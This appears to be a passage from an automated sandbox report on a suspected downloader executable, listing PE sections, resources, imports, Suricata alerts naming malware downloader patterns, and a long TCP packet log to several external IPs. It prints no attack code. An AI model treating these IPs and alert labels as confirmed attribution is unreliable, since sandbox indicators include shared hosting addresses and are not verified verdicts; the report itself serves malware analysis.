.text	0x1000	0x5fdd	0x6000	38462d04cfdbc4943d18be461d53cc3e	False	0.6783854166666666	data	6.499697507009752	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x7000	0x1352	0x1400	3d134ae5961af9895950a7ee0adc520a	False	0.4583984375	data	5.207538993430304	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x9000	0x254f8	0x600	2d00401e0c64d69b6d0ccb877d9f624e	False	0.4544270833333333	data	4.0323505938358934	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x2f000	0x13000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x42000	0x1aa58	0x1ac00	098718c0c5bf54afe6e125c2f1ac35ba	False	0.23448452102803738	data	3.706045365348602	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_BITMAP	0x42460	0x368	Device independent bitmap graphic, 96 x 16 x 4, image size 768	English	United States	0.23623853211009174
RT_ICON	0x427c8	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 0	English	United States	0.09021944871643203
RT_ICON	0x52ff0	0x32f2	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States	0.9443336911516639
RT_ICON	0x562e8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	English	United States	0.16089211618257263
RT_ICON	0x58890	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	English	United States	0.18738273921200752
RT_ICON	0x59938	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	English	United States	0.31050106609808104
RT_ICON	0x5a7e0	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	English	United States	0.440884476534296
RT_ICON	0x5b088	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	English	United States	0.5635838150289018
RT_ICON	0x5b5f0	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	English	United States	0.2703900709219858
RT_ICON	0x5ba58	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 0	English	United States	0.21908602150537634
RT_ICON	0x5bd40	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 0	English	United States	0.3716216216216216
RT_DIALOG	0x5be68	0x144	data	English	United States	0.5216049382716049
RT_DIALOG	0x5bfb0	0x13c	data	English	United States	0.5506329113924051
RT_DIALOG	0x5c0f0	0x100	data	English	United States	0.5234375
RT_DIALOG	0x5c1f0	0x11c	data	English	United States	0.6056338028169014
RT_DIALOG	0x5c310	0xc4	data	English	United States	0.5918367346938775
RT_DIALOG	0x5c3d8	0x60	data	English	United States	0.7291666666666666
RT_GROUP_ICON	0x5c438	0x92	data	English	United States	0.6575342465753424
RT_VERSION	0x5c4d0	0x248	data	English	United States	0.5308219178082192
RT_MANIFEST	0x5c718	0x340	XML 1.0 document, ASCII text, with very long lines (832), with no line terminators	English	United States	0.5540865384615384

Imports

DLL	Import
KERNEL32.dll	SetEnvironmentVariableA, Sleep, GetTickCount, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, GetFileAttributesA, SetFileAttributesA, GetWindowsDirectoryA, GetTempPathA, GetCommandLineA, lstrlenA, GetVersion, SetErrorMode, lstrcpynA, ExitProcess, GetFullPathNameA, GlobalLock, CreateThread, GetLastError, CreateDirectoryA, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, ReadFile, WriteFile, lstrcpyA, MoveFileExA, lstrcatA, GetSystemDirectoryA, GetProcAddress, CloseHandle, SetCurrentDirectoryA, MoveFileA, CompareFileTime, GetShortPathNameA, SearchPathA, lstrcmpiA, SetFileTime, lstrcmpA, ExpandEnvironmentStringsA, GlobalUnlock, GetDiskFreeSpaceA, GlobalFree, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, GetPrivateProfileStringA, FindClose, MultiByteToWideChar, FreeLibrary, MulDiv, WritePrivateProfileStringA, LoadLibraryExA, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, GlobalAlloc
USER32.dll	ScreenToClient, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, PostQuitMessage, GetWindowRect, EnableMenuItem, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndDialog, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, GetDC, CreateDialogParamA, SetTimer, GetDlgItem, SetWindowLongA, SetForegroundWindow, LoadImageA, IsWindow, SendMessageTimeoutA, FindWindowExA, OpenClipboard, TrackPopupMenu, AppendMenuA, EndPaint, DestroyWindow, wsprintfA, ShowWindow, SetWindowTextA
GDI32.dll	SelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll	SHGetSpecialFolderLocation, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA
ADVAPI32.dll	RegDeleteKeyA, SetFileSecurityA, OpenProcessToken, LookupPrivilegeValueA, AdjustTokenPrivileges, RegOpenKeyExA, RegEnumValueA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
COMCTL32.dll	ImageList_Create, ImageList_AddMasked, ImageList_Destroy
ole32.dll	OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-21T11:04:03.422209+0200	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.4	62508	142.250.185.206	443	TCP
2024-10-21T11:04:09.084667+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	62510	158.101.44.242	80	TCP
2024-10-21T11:04:10.365945+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	62510	158.101.44.242	80	TCP
2024-10-21T11:04:11.057764+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	62512	188.114.97.3	443	TCP
2024-10-21T11:04:11.756572+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	62513	158.101.44.242	80	TCP
2024-10-21T11:04:13.894461+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	62516	188.114.97.3	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 21, 2024 11:04:02.068619013 CEST	62508	443	192.168.2.4	142.250.185.206
Oct 21, 2024 11:04:02.068692923 CEST	443	62508	142.250.185.206	192.168.2.4
Oct 21, 2024 11:04:02.068866014 CEST	62508	443	192.168.2.4	142.250.185.206
Oct 21, 2024 11:04:02.080171108 CEST	62508	443	192.168.2.4	142.250.185.206
Oct 21, 2024 11:04:02.080209017 CEST	443	62508	142.250.185.206	192.168.2.4
Oct 21, 2024 11:04:02.959755898 CEST	443	62508	142.250.185.206	192.168.2.4
Oct 21, 2024 11:04:02.959829092 CEST	62508	443	192.168.2.4	142.250.185.206
Oct 21, 2024 11:04:02.960834980 CEST	443	62508	142.250.185.206	192.168.2.4
Oct 21, 2024 11:04:02.960891962 CEST	62508	443	192.168.2.4	142.250.185.206
Oct 21, 2024 11:04:03.034306049 CEST	62508	443	192.168.2.4	142.250.185.206
Oct 21, 2024 11:04:03.034344912 CEST	443	62508	142.250.185.206	192.168.2.4
Oct 21, 2024 11:04:03.035274029 CEST	443	62508	142.250.185.206	192.168.2.4
Oct 21, 2024 11:04:03.035332918 CEST	62508	443	192.168.2.4	142.250.185.206
Oct 21, 2024 11:04:03.039933920 CEST	62508	443	192.168.2.4	142.250.185.206
Oct 21, 2024 11:04:03.087429047 CEST	443	62508	142.250.185.206	192.168.2.4
Oct 21, 2024 11:04:03.422235012 CEST	443	62508	142.250.185.206	192.168.2.4
Oct 21, 2024 11:04:03.422374964 CEST	62508	443	192.168.2.4	142.250.185.206
Oct 21, 2024 11:04:03.425033092 CEST	62508	443	192.168.2.4	142.250.185.206
Oct 21, 2024 11:04:03.425122023 CEST	443	62508	142.250.185.206	192.168.2.4
Oct 21, 2024 11:04:03.425491095 CEST	443	62508	142.250.185.206	192.168.2.4
Oct 21, 2024 11:04:03.425532103 CEST	62508	443	192.168.2.4	142.250.185.206
Oct 21, 2024 11:04:03.426064968 CEST	62508	443	192.168.2.4	142.250.185.206
Oct 21, 2024 11:04:03.641129971 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:03.641164064 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:03.641379118 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:03.645020962 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:03.645037889 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:04.709604025 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:04.709703922 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:04.713897943 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:04.713905096 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:04.714293957 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:04.714340925 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:04.714699984 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:04.759399891 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.374824047 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.375073910 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:07.383337021 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.383394003 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:07.492901087 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.493091106 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:07.493102074 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.493149042 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:07.497586966 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.497736931 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.497781038 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:07.497787952 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.497827053 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:07.502320051 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.505176067 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:07.505181074 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.505249023 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:07.508616924 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.508671999 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:07.508744955 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.508789062 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:07.517555952 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.521048069 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:07.521053076 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.521208048 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:07.526412010 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.526531935 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.526582003 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:07.526587963 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.526633024 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:07.550595999 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.550796032 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.550888062 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:07.550888062 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:07.550895929 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.551110029 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:07.555538893 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.555594921 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:07.555598974 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.555644035 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:07.555648088 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.555697918 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:07.611551046 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.611709118 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.611762047 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.611912012 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:07.611912012 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:07.611915112 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.611923933 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.611969948 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:07.612052917 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.612099886 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:07.612312078 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.612359047 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:07.612364054 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.612410069 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:07.613898993 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.614124060 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.614152908 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.614187956 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:07.614196062 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.614221096 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:07.614236116 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:07.618377924 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.619807005 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.619873047 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:07.619878054 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.619919062 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:07.619923115 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.619962931 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:07.627187014 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.627230883 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.627280951 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:07.627285957 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.627326012 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:07.632013083 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.632179022 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:07.632184029 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.632230997 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:07.637671947 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.637720108 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:07.637725115 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.637773991 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:07.643467903 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.643517017 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:07.643574953 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.643618107 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:07.649137974 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.649188995 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:07.649223089 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.649265051 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:07.655023098 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.655071020 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:07.655088902 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.655129910 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:07.660588026 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.660634041 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:07.660674095 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.660717010 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:07.666490078 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.666537046 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:07.666608095 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.666652918 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:07.672338963 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.672390938 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:07.672444105 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.672487974 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:07.677772045 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.677815914 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:07.677862883 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.677908897 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:07.683566093 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.683615923 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:07.683625937 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.683670044 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:07.689203024 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.689261913 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:07.689269066 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.689317942 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:07.730624914 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.730685949 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:07.730688095 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.730698109 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.730735064 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:07.730822086 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.730866909 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:07.731004000 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.731050968 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:07.731375933 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.731422901 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:07.731568098 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.731611013 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.731611013 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:07.731617928 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.731662035 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:07.731900930 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.731949091 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:07.732156038 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.732198000 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.732198954 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:07.732204914 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.732244015 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:07.732250929 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.732302904 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:07.733800888 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.733845949 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:07.733891964 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.733938932 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:07.873346090 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.873399019 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:07.873406887 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.873450041 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:07.874248981 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.874294043 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:07.874366045 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.874409914 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:07.874414921 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.874463081 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:07.874587059 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.874631882 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:07.874810934 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.874851942 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:07.874856949 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.874900103 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:07.875044107 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.875089884 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:07.875216961 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.875262976 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:07.875400066 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.875447989 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:07.875452995 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.875497103 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:07.875641108 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.875679970 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.875682116 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:07.875688076 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.875725985 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:07.875998020 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.876048088 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:07.876087904 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.876137972 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:07.876382113 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.876425982 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.876426935 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:07.876432896 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.876473904 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:07.876480103 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.876519918 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:07.876952887 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.876992941 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:07.877000093 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.877046108 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:07.877270937 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.877315044 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.877315998 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:07.877322912 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.877367020 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:07.877372026 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.877414942 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:07.877938986 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.877971888 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.877981901 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:07.877985954 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.878014088 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:07.878041983 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:07.878278971 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.878323078 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:07.878323078 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.878330946 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.878370047 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:07.878914118 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.878961086 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:07.878962994 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.878969908 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.879005909 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:07.879144907 CEST	443	62509	216.58.206.33	192.168.2.4
